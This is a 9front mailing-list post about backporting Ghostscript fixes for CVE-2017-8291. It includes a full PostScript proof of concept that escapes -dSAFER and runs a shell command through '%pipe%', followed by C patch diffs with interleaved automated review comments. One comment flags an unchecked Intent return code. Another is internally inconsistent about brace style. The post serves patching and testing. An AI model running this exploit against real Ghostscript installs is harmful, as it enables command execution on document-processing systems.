From: Jacob Moody <jsmoody@iastate.edu>
To: 9front@9front.org
Subject: [9front] ghostscript: Mitigations against CVE-2017-8291
Date: Fri, 21 Jun 2019 05:53:16 -0500	[thread overview]
Message-ID: <CA+gzr0+-jeWnYT+OyppDNeOqxZsbsxe2a-HqB+tkHHk4m2MS3Q@mail.gmail.com> (raw)

All,

Grabbed the upstream changes for the mitigation against CVE-2017-8291.
The proofs of concept I found online do not seem to do anything
interesting besides hanging gs indefinitely or making it suicide.

To reproduce:
gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100


/size_from  10000      def
/size_step    500      def
/size_to   65000      def
/enlarge    1000      def

%/bigarr 65000 array def

0
size_from size_step size_to {
    pop
    1 add
} for

/buffercount exch def

/buffersizes buffercount array def


0
size_from size_step size_to {
    buffersizes exch 2 index exch put
    1 add
} for
pop

/buffers buffercount array def

0 1 buffercount 1 sub {
    /ind exch def
    buffersizes ind get /cursize exch def
    cursize string /curbuf exch def
    buffers ind curbuf put
    cursize 16 sub 1 cursize 1 sub {
        curbuf exch 255 put
    } for
} for


/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload

{
    .eqproc
    buffersearchvars 0 buffersearchvars 0 get 1 add put
    buffersearchvars 1 0 put
    buffersearchvars 2 0 put
    buffercount {
        buffers buffersearchvars 1 get get
        buffersizes buffersearchvars 1 get get
        16 sub get
        254 le {
            buffersearchvars 2 1 put
            buffersearchvars 3 buffers buffersearchvars 1 get get put
            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
        } if
        buffersearchvars 1 buffersearchvars 1 get 1 add put
    } repeat

    buffersearchvars 2 get 1 ge {
        exit
    } if
    %(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put


buffersearchvars 0 get array aload

sdevice 0 get
16#3e8 0 put

sdevice 0 get
16#3b0 0 put

sdevice 0 get
16#3f0 0 put


currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

.


Patch:
diff -r 986e26228cfe sys/src/cmd/gs/src/zfrsd.c
--- a/sys/src/cmd/gs/src/zfrsd.c    Thu May 23 14:59:28 2019 +0200
+++ b/sys/src/cmd/gs/src/zfrsd.c    Fri Jun 21 05:34:42 2019 -0500
@@ -47,13 +47,19 @@
     ref *pFilter;
     ref *pDecodeParms;
     int Intent;
-    bool AsyncRead;
+    bool AsyncRead = false;
     ref empty_array, filter1_array, parms1_array;
     uint i;
-    int code;
+    int code = 0;
+
+    if (ref_stack_count(&o_stack) < 1)
+        return_error(e_stackunderflow);
+    if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
+         return_error(e_typecheck);

     make_empty_array(&empty_array, a_readonly);
-    if (dict_find_string(op, "Filter", &pFilter) > 0) {
+    if (r_has_type(op, t_dictionary)
+        && dict_find_string(op, "Filter", &pFilter) > 0) {
     if (!r_is_array(pFilter)) {
         if (!r_has_type(pFilter, t_name))
         return_error(e_typecheck);
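Review bot: The added `return_error(e_typecheck);` under the new `if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))` test is indented nine spaces, one more than the `return_error(e_stackunderflow);` line two lines above it that uses the same structure; align it to eight so the two guards read as a pair. The rest of the new code is consistent: the stack-depth check precedes the first dereference of op, and the `dict_find_string` call is now reached only when op is a dictionary. The enclosing function (zrsdparams, including the declaration of op) starts before this hunk, so the order of the guards relative to the earlier declarations could not be confirmed here.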
@@ -92,10 +98,12 @@
         return_error(e_typecheck);
     }
     }
-    if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
-    (code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
-    )
-    return code;
+    if (r_has_type(op, t_dictionary))
+        code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
+
+    if (r_has_type(op, t_dictionary))
+        if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
+            return code;
     push(1);
     op[-1] = *pFilter;
     if (pDecodeParms)
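Review bot: The result of `code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);` is stored but never tested, so an Intent value that is out of range or of the wrong type — which the removed combined condition rejected with `return code;` — now falls through to `push(1)` and the operator proceeds; add `if (code < 0) return code;` immediately after that line, or fold the call back into the AsyncRead condition so both parameters are rejected the same way. Intent is also assigned only inside the dictionary branch, unlike AsyncRead which the first hunk initializes; if Intent is read later in the function for the null-operand case it would be uninitialized, but its later uses are outside this hunk, so initializing it at declaration alongside AsyncRead is the cheap way to be sure. The two consecutive `if (r_has_type(op, t_dictionary))` tests could be one block.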
diff -r 986e26228cfe sys/src/cmd/gs/src/zmisc3.c
--- a/sys/src/cmd/gs/src/zmisc3.c    Thu May 23 14:59:28 2019 +0200
+++ b/sys/src/cmd/gs/src/zmisc3.c    Fri Jun 21 05:34:42 2019 -0500
@@ -55,6 +55,12 @@
     ref2_t stack[MAX_DEPTH + 1];
     ref2_t *top = stack;

+    if (ref_stack_count(&o_stack) < 2)
+        return_error(e_stackunderflow);
+    if (!r_is_array(op - 1) || !r_is_array(op)) {
+        return_error(e_typecheck);
+    }
+
     make_array(&stack[0].proc1, 0, 1, op - 1);
     make_array(&stack[0].proc2, 0, 1, op);
     for (;;) {
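Review bot: The two new guards use different brace styles — `return_error(e_stackunderflow);` is an unbraced body while `return_error(e_typecheck);` is braced — so one should match the other, preferably braced as the stack-depth check in the zfrsd.c hunk of this same patch is also unbraced and the file should pick one. The `r_is_array` check validates only the two top-level operands that `make_array` wraps; whether the elements fetched from them in the `for (;;)` comparison loop are type-checked before being dereferenced cannot be seen here, since that loop and the start of the function (zeqproc) are both outside the hunk.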



Thanks,

moody

